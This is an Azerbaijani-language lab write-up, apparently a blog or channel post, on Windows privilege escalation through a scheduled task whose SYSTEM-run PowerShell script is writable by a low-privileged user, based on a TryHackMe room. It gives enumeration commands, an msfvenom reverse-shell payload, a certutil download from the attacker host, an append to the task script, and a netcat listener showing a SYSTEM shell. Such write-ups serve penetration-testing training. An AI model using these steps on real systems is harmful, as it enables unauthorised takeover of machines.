Windows mühitində işləyərkən Scheduled Tasks ilə PrivEsc necə həyata keçirilir?Windows-da Scheduled Tasks ilə PrivEsc necə həyata keçirilir?Scheduled Tasks ilə PrivEsc nədir? Servislərin Exploit Edilməsi nədir? (Scheduled Tasks)
Telegram kanalına qoşularaq bu və digər mövzular üzrə quizlərdə iştirak edə bilərsiniz!
Telegram (Kanal): https://t.me/xakeraz_official
Scheduled Tasks ilə PrivEsc
Siz əvvəlki paylaşımlardan cron tapşırıqlarından necə istifadə ediləcəyini öyrənmisiniz.Windows əməliyyat sistemində isə cron Scheduled Tasks bərabərdir.Burada istifadəçilər özlərinin adından planlaşdırılmış tapşırıq təyin edə,yüksək səlahiyyətli istifadəçilər isə həm özlərinə, həm də digər istifadəçilərin adından tapşırıq təyin edə bilər.Tapşırıqların bəziləri yüksək səlahiyyətli istifadəçi adına təyin edilə bilər və həmin fayl aşağı imtiyazlı istifadəçi tərəfindən dəyişdirilə bilər.Bir qayda olaraq belə zəiflikləri exploit etmək üçün aşağıdakı əməliyyatları yerinə yetirməliyik.
- Zəiflik olan skriptin tapılması,manual olaraq (Bu powershell skripti və ya icra faylı ola bilər)
Zəifliyin axtarılması üçün aşağıdakı kommandalardan istifadə edə bilərsiniz: (Ya da avtomatlaşdırılmış skriptlərdən tətbiq edin)
schtasks /query /fo LIST /v
schtasks /query /fo table
Get-ScheduledTask | Select-Object TaskName, Actions
Get-ScheduledTask | Get-ScheduledTaskInfo
Bizim tapşırığımızda zəiflik olan fayl powershell skriptidir.
C:\DevTools\CleanUp.ps
2.Tərkibinə baxış və kodların araşdırılması
C:\Users\user>type C:\DevTools\CleanUp.ps1
# This script will clean up all your old dev logs every minute.
# To avoid permissions issues, run as SYSTEM (should probably fix this later)
Remove-Item C:\DevTools\*.log
Faylın tərkibini oxuduqda onun logları silmək üçün istifadə olunan və SYSTEM icazələri ilə işləyən tapşırıq olduğunu görə bilərik.
3.İstənilən alət ilə bizim hədəf üzərində icazələrimizi təyin etməliyik.(Mümkün yazma əməliyyatını yerinə yetirmək üçün)
C:\Users\user>C:\PrivEsc\accesschk.exe /accepteula -quvw user C:\DevTools\CleanUp.ps1
RW C:\DevTools\CleanUp.ps1
FILE_ADD_FILE
FILE_ADD_SUBDIRECTORY
FILE_APPEND_DATA
FILE_EXECUTE
FILE_LIST_DIRECTORY
FILE_READ_ATTRIBUTES
FILE_READ_DATA
FILE_READ_EA
FILE_TRAVERSE
FILE_WRITE_ATTRIBUTES
FILE_WRITE_DATA
FILE_WRITE_EA
DELETE
SYNCHRONIZE
READ_CONTROL
Hədəf fayl üzərində olan icazələrimizin isə aşağıdakı cədvəldə verilmişdir.
| İcazə | Təyinatı |
|---|---|
| FILE_ADD_FILE | Kataloqa yeni fayl əlavə etmək. (Yəni qovluğa fayl yaratmaq) |
| FILE_ADD_SUBDIRECTORY | Kataloqa yeni alt qovluq yaratmaq. |
| FILE_APPEND_DATA | Fayla məlumat əlavə etmək (append). |
| FILE_EXECUTE | Faylı icra etmək. (Executable fayllar üçün) |
| FILE_LIST_DIRECTORY | Qovluqdakı faylları sadalamaq (dir və ya ls). |
| FILE_READ_ATTRIBUTES | Fayl və ya qovluğun atributlarını oxumaq (məsələn, “Read-only”). |
| FILE_READ_DATA | Fayldan məlumat oxumaq. |
| FILE_READ_EA | Faylın əlavə atributlarını oxumaq (Extended Attributes). |
| FILE_TRAVERSE | Qovluğun içindən keçib digər qovluğa daxil olmaq (Traverse). |
| FILE_WRITE_ATTRIBUTES | Fayl və ya qovluğun atributlarını dəyişmək. |
| FILE_WRITE_DATA | Fayla məlumat yazmaq (overwrite və ya yeni məlumat). |
| FILE_WRITE_EA | Faylın əlavə atributlarını dəyişmək. |
| DELETE | Faylı və ya qovluğu silmək. |
| SYNCHRONIZE | Fayl və ya qovluğa paralel giriş üçün sinxronizasiya (işlərin bloklanmadan davam etməsi üçün). |
| READ_CONTROL | Fayl və ya qovluğun Access Control List-lərini oxumaq (yəni kimdə hansı icazə var, onu oxumaq). |
Göründüyü kimi hədəf fayl üzərində yazma icazəmiz vardır və biz bundan istifadə edərək zərərli exe faylını hədəfə ötürüb, skript yardımı ilə icra etdirsək, system shelinə sahib olacayıq.
4.Exploit Edilməsi
Hədəf üçün exe formatında shell hazırlayıb ötürürük.
msfvenom -p windows/x64/reverse_shell_tcp LHOST=10.9.3.67 LPORT=4444 -f exe -o /root/Desktop/shell.exe
Windowsda----------------------------
C:\Users\user\Desktop>certutil.exe -f -split -urlcache http://10.9.3.67/shell.exe
**** Online ****
0000 ...
1c00
CertUtil: -URLCache command completed successfully.
Artıq shell.exe zərərli faylımız hədəfdə Desktoq qovluğu altında saxlanılır.Bizim indiki işimiz zərərli icra faylımızı yazma icazəmiz skriptə daxil etməkdir.
C:\Users\user\Desktop>echo C:\Users\user\Desktop\shell.exe >> C:\DevTools\CleanUp.ps1
İndi Planlaşdırılmış tapşırığın işə düşməyini gözləyirik və əvvəlcədən qurduğumuz listenerə hədəfdən SYSTEM səlahiyyəti ilə shell əldə edirik.
┌──(root㉿kali)-[~]
└─# nc -nvlp 4444
listening on [any] 4444 ...
connect to [10.9.3.67] from (UNKNOWN) [10.10.95.121] 49829
Microsoft Windows [Version 10.0.17763.737]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>
Tapşırıqda istifadə olunan lab: https://tryhackme.com/room/windows10privesc 13-cü Task
Ümidvaram faydalı olmuşdur.Təşəkkürlər!
Bizi izləyin:
Telegram (Kanal): https://t.me/xakeraz_official
Paylaşımların səliqəli yığılmış halı: https://t.me/xakerazgroup
Fikir və şərhləriniz : https://t.me/xakerazchat